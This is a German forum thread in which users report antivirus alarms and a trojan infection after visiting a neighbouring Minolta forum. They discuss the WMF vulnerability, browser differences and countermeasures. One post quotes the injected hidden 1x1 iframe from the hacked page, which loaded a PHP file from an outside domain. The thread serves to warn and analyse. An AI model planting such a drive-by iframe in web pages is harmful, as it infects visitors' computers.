Ich bin eben, nur versehentlich ( :oops: ), in anderen (Minolta)-Forum gelandet und schon spielte mein Viren-Programm verrückt (Downloader.Trojan).

Also bitte vorsichtig.

Einen ähnlichen Alarm hatte mir ein Teamkollege per PN vermeldet (mit IE unterwegs). Ich war daraufhin absichtlich da: mit Firefox und McAfee ging bei mir allerdings keine Lampe an.

Einen ähnlichen Alarm hatte mir ein Teamkollege per PN vermeldet (mit IE unterwegs). Ich war daraufhin absichtlich da: mit Firefox und McAfee ging bei mir allerdings keine Lampe an.

Ich war mit Billy-Boy da und Norton spielte verrückt.
Die User sollten sich besser in diesem Forum aufhalten, oder? :mrgreen:

und schon spielte mein Viren-Programm verrückt (Downloader.Trojan).
Gabs vor kurzem schon einmal. Nach ein paar Tagen war der Spuk vorbei. Hast Du aber sicherlich dort auch Bescheid gegeben, oder?

und schon spielte mein Viren-Programm verrückt (Downloader.Trojan).
Gabs vor kurzem schon einmal. Nach ein paar Tagen war der Spuk vorbei. Hast Du aber sicherlich dort auch Bescheid gegeben, oder?

Die sind da im Forum schon richtig am diskutieren.

Währe nett zu erfahren welches es denn ist, damit man nicht auch hinein stolpert!

Währe nett zu erfahren welches es denn ist, damit man nicht auch hinein stolpert!
minolta-forum.de
Es installiert sich die beliebte paytime.exe, die u.a. die Startseite des ie6 verändert, hatte eben auch gerade Alarm.

PS. Ich bin auch lieber hier! :top:

Moin

der Teamkollege bin ich...
und das betroffenen forum ist das

www. konicaminolta-forum. de
ich treibe mich in unserem Nachbarforum nämlich auch ganz gerne rum.

Die scheinen dort dieses Problem mit den bösen wmf-dateien zu haben. Jedenfalls hat mein Dienst-PC heute gemeldet, dass er den Virus erkannt und unschädlich gemacht hat, das letzte Fenster das er dann angezeigt hat war aber ein Windows-Bild und Fax-Anzeige fenster, das ein wmf.-Bild öffnen wollte. Es wurde aber nix angezeigt, weil der Virenscanner die Datei schon geblockt hatte (hoffe ich.... :evil: )

Jetzt zuhause macht mein Panda das gleiche.

der Alarm sieht
http://www.d7userforum.de/phpBB2/4images/data/thumbnails/6/virusalarm_Minolta-forum.jpg (http://www.d7userforum.de/phpBB2/4images/details.php?image_id=23229)
aus.

Gruß
PETER

hatte selber vor ein paar Wochen einen Trojaner auf dem Rechner, und große Mühe den wieder los zu werden. War Hartnäckig bis zum geht nicht mehr, hab mein ganzes System neu aufspielen müssen.
Man kann nur Hoffen das diese für mich kriminellen Macher mal zu fassen bekommt.
Sollte mir so einer mal in die Finger kommen möchte ich mal behaupten hat derjenige ein Problem, nur leiderläuft mir keiner über den Weg! :cry:

Holla die Waldfee, mein Virenscanner schreit auch Zeter und Mordio. Ich gehe über AOL rein.

Ich surfe mit Firefox. Auf der angesprochenen Seite ist ganz links oben ein winziges Frame zu sehen, in dem irgendeine php auf toolbardollars(dot)biz geladen werden soll.

Hat jemand ne Ahnung, um was es sich dabei handelt? Und wie das Frame da hin kommt?

Schöne Grüße, Holger

Holla die Waldfee, mein Virenscanner schreit auch Zeter und Mordio. Ich gehe über AOL rein.

Und ich bleib da schön draussen - testet Ihr mal alle Eure Virenscanner... :evil: :evil: :roll:

Man kann nur Hoffen das diese für mich kriminellen Macher mal zu fassen bekommt.
Sollte mir so einer mal in die Finger kommen möchte ich mal behaupten hat derjenige ein Problem, nur leiderläuft mir keiner über den Weg! :cry:

Na dann wirst Du, wie ich mitgelesen habe, wohl nach Rußland gehen müssen.
Von den Temperaturen bist Du ja schon etwas vorbereitet. :lol:

Mit Opera 8.50 & Kaspersky Anti-Virus Personal habe ich meine Ruhe... :top:

Und wie das Frame da hin kommt?
Ich schätze mal mit DHL & Freeway-Paketmarke :D

Nee im Ernst:

Es könnte sich um einen Hack der Forumssoftware handeln.

Der Quellcode der Indexseite weist im <head>-tag eine Veränderung auf:
<head>
<bugame src="http://toolbardollars.biz/dl/adv553.php" width=1 height=1></iframe>
<title>Portal</title> .........
Den einleitenden <iframe>-Tag hat mein Firefox wohl gefressen, so dass der Code nicht zur Ausführung kommt.

Übrigens werden wir im Team u.a. aus solchen Gründen immer heftig emsig wenn es darum geht, ein Security-Update in unsere Forumssoftware einzuspielen.

Den einleitenden <iframe>-Tag hat mein Firefox wohl gefressen, so dass der Code nicht zur Ausführung kommt.

Meiner offenbar auch. Gottseidank.

Übrigens werden wir im Team u.a. aus solchen Gründen immer heftig emsig wenn es darum geht, ein Security-Update in unsere Forumssoftware einzuspielen.

:top:

Schöne Grüße, Holger

Hallo
ich war Mittag im Minolta Forum und dabei hat es mich voll erwischt der Virenscanner spielte verrückt und konnte weder desinfizieren noch in die Quarantäne verschieben . Der Rechner machte was er wollte, mal an dann gleich wieder aus, Desktop wurde erst grün dann blau und schwarz.
dannach ungefähr 7-8 Fehlermeldungen die so schnell kamen das ich nur noch rote Kreuze gesehen habe. :roll: :roll:
der Virenscanner hat dann 12 Viren und Trojaner in C:/Dokumente und Einstellungen gefunden . Teilweise konnte er sie unschädlich machen teilweise nicht. 7 Trojaner sind geblieben. Also System neu aufgesetzt und jetzt bin ich erst mal mit dem Gröbsten fertig.

Ps: Ich halte mich erst mal ein paar Tage von dort fern.
Muss wohl was mit WMF Files sein.

Also schön Vorsichtig :!: :!: :twisted:

Gruß Thomas

Wäre es nicht eine Überlegung wert ob man die User in unserem Forum nicht per E-Mail benachrichtigt, wenn sich hier auch einmal soetwas einschleichen sollte.

hatte selber vor ein paar Wochen einen Trojaner auf dem Rechner, und große Mühe den wieder los zu werden. War Hartnäckig bis zum geht nicht mehr, hab mein ganzes System neu aufspielen müssen.
Man kann nur Hoffen das diese für mich kriminellen Macher mal zu fassen bekommt.
Sollte mir so einer mal in die Finger kommen möchte ich mal behaupten hat derjenige ein Problem, nur leiderläuft mir keiner über den Weg! Weinen

Vielleicht war der im System32-Ordner, dann stellt die Systemwiederherstellung, wenn aktiv(standardmäßig), den Parasiten nach dem Entfernen wieder her. System und Virenscanner spielen dann quasi Ping-Pong :D

Und wie das Frame da hin kommt?
Ich schätze mal mit DHL & Freeway-Paketmarke :D

Nee im Ernst:

Es könnte sich um einen Hack der Forumssoftware handeln.

Der Quellcode der Indexseite weist im <head>-tag eine Veränderung auf:
<head>
<bugame src="http://toolbardollars.biz/dl/adv553.php" width=1 height=1></iframe>
<title>Portal</title> .........
Den einleitenden <iframe>-Tag hat mein Firefox wohl gefressen, so dass der Code nicht zur Ausführung kommt.

Übrigens werden wir im Team u.a. aus solchen Gründen immer heftig emsig wenn es darum geht, ein Security-Update in unsere Forumssoftware einzuspielen.

hmm.. hab grad auch ein wenig rumgespielt... das ganze scheint im firefox gewollt nicht zu klappen, denn der macht ja bekanntlich die wmf.dateien nicht direkt auf. wenn man die adv553.php im firefox öffnet, ist die nämlich praktisch leer.
im ie aber kann man schön den code-sehen wie wieder etliche iframes aufgemacht werden...
naja, der firmenrechner hier war zum glück gewappnet ;)

gruss
michel

mmmmh, die Frage ist doch, wie kommt der Code von deren Seite? Um von der Seite zu kommen, muß der zuvor auf den Server gelegt worden sein . . .
Oder, irgend ein Werbebannerserver ist gehakt und verteilt über die Einbindung auf der Seite Parasiten. Ist ja auch schon mal da gewesen, asl Falk-Webeserver gehakt wurden und dann statt Banner lustige Programme verteilt haben.

Moin

der Teamkollege bin ich...
und das betroffenen forum ist das

www. konicaminolta-forum. de
ich treibe mich in unserem Nachbarforum nämlich auch ganz gerne rum.



Hallo Peter,

wie bekannt bin ich auch dort zu gange,

der Spuck ist aber wieder weg :top:

PS: Mein Schutz hat erfolgreich den Virus isoliert :top:

Moin

der Teamkollege bin ich...
und das betroffenen forum ist das

www. konicaminolta-forum. de
ich treibe mich in unserem Nachbarforum nämlich auch ganz gerne rum.



Hallo Peter,

wie bekannt bin ich auch dort zu gange,

der Spuck ist aber wieder weg :top:

PS: Mein Schutz hat erfolgreich den Virus isoliert :top:

und wie kam der Dreck da rein?

Wäre es nicht eine Überlegung wert ob man die User in unserem Forum nicht per E-Mail benachrichtigt, wenn sich hier auch einmal soetwas einschleichen sollte.

ALLE :?: :?: :?: :shock:

Also neee, das wäre irgendwie.... ich weiss nicht....

Ich denke mal der überwiegendste Teil verfügt eh über aktuelle Firewall & Virenschutz. Und ein grundsätzliches Risiko ist immer da sobald ich online gehe. Irgendwie ist das wie Empfängnisverhütung: Hundertpro ist nicht ausser Du lässt es sein oder *schnipp* :cool:

Wir sind natürlich nicht hundertpro davor gefeit, wir können uns nur intensiv bemühen möglichst nahe 100 zu kommen und bleiben.

Und sollte es uns doch erwischen: Zur Not Forum Offline schalten und flugs reparieren.

Moin

der Teamkollege bin ich...
und das betroffenen forum ist das

www. konicaminolta-forum. de
ich treibe mich in unserem Nachbarforum nämlich auch ganz gerne rum.



Hallo Peter,

wie bekannt bin ich auch dort zu gange,

der Spuck ist aber wieder weg :top:

PS: Mein Schutz hat erfolgreich den Virus isoliert :top:

und wie kam der Dreck da rein?

Null Ahnung,

vielleicht war es ein Maulwurf :lol:

Wäre es nicht eine Überlegung wert ob man die User in unserem Forum nicht per E-Mail benachrichtigt, wenn sich hier auch einmal soetwas einschleichen sollte.



Und sollte es uns doch erwischen: Zur Not Forum Offline schalten und flugs reparieren.

Das ist auch gut so. :top:
Aber wenn seit vormittag das Problem besteht und ich gegen 16.00 Uhr die Virenmeldung bekomme finde ich soetwas, von der Reaktionszeit her, nicht in Ordnung. :evil:

Ich hatte heute im Nachbarforum mit IE & Firefox keinerlei Probleme mit deren Seite...

Hatt heut Nachmittag auch diese Spielereien mit dem IE6 in getunter Form (Slimbrowser) und AntiVir. Antivir hat undgefähr 15 Meldungen ausgespuckt bevor sich der Browser aufgehängt hat... vorher wollte er auch das besabte wmf-Bild öffnen.
Hab dann extra Firefox installiert :D

Das der nicht darauf anschlägt liegt daran, das Firefeox (bzw. netscape allgemein) nicht mit iFrames zurechtkommen und deise schlicht und ergreifend links liegen lassen... Glück für uns :)

Aber sagt mal ... wenn man alle Patches von MS eingespielt hat, dürfte doch eigentlich nichts passieren können? Ich meine, man kennt doch nicht alle Webseiten, die man so besucht, persönlich?

Habn MAC, das ist Schutz genug :lol: Der kennt keine Viren.

Aber sagt mal ... wenn man alle Patches von MS eingespielt hat, dürfte doch eigentlich nichts passieren können? Ich meine, man kennt doch nicht alle Webseiten, die man so besucht, persönlich?

..auch Microsoft kann meist nur auf derartige Angriffe reagieren. Leider dauert das auch manchmal etwas länger.

Habn MAC, das ist Schutz genug :lol: Der kennt keine Viren.
Aber nur mangels Verbreitung! ;)

Ich habe irgendwo gelesen, man soll einfach den Standard für wmf-Dateien ändern (mit welchem Programm darf ich diese Datei öffnen).

Daraufhin habe ich alles auf "o" gesetzt und habe jetzt hoffentlich etwas mehr Ruhe.

Ich habe den Feuerfuchs und Norton, welches eigenständig nach "updates" suchen darf (LiveUpdate sucht autom., sobald ich im Netzt bin).

Frank

Mein Rechner ist auf dem aktullen Patchstand und ich hatte bisher keine Probleme. Wer aber absolut auf Nummer sicher gehen will, der kann eine DLL in Windows deregistrieren. Mehr dazu unter: Heise News (http://www.heise.de/newsticker/result.xhtml?url=/newsticker/meldung/67814&words=WMF%20wmf)

Das der nicht darauf anschlägt liegt daran, das Firefeox (bzw. netscape allgemein) nicht mit iFrames zurechtkommen und deise schlicht und ergreifend links liegen lassen
Das stimmt so nicht, allerdings ignoriert ein Mozilla einen schliessenden ohne einen öffnenden Tag. Wie du ein paar Postings weiter oben lesen kannst wurde der iframe nur geschlossen, aber nicht geöffnet. Ein IE hält sich halt einfach weniger an einen Syntaktisch richtige Standart.
Habn MAC, das ist Schutz genug Lachen Der kennt keine Viren.
Auch auf einem Mac kann man mit dem IE surfen und sich somit eine ganze Menge Ärger einfangen. Es gibt weniger Viren, das ist richtig. Grund für die wmf Anzeigenprobleme waren aber zunächst nicht die Viren an sich sondern ein Fehler im Aufbau des Darstellungsdienstes. Die Programmierung ist ja auch bald 8 Jahre her. Das kann man auch ganz gut unter Heise.de nachlesen, ich empfehle hier auch erstmal die Anzeige im IE in der Registry zu entfernen, bzw. die DLL zu deregistrieren.
Fehler in der Software können passieren. Viren sind leider Tatsache und nicht mehr wegzudenken. Bleibt uns einfach zu hoffen das wir hier gute Arbeit geleistet haben und unser Forum so weit wie möglich verschont bleibt :top:
Basti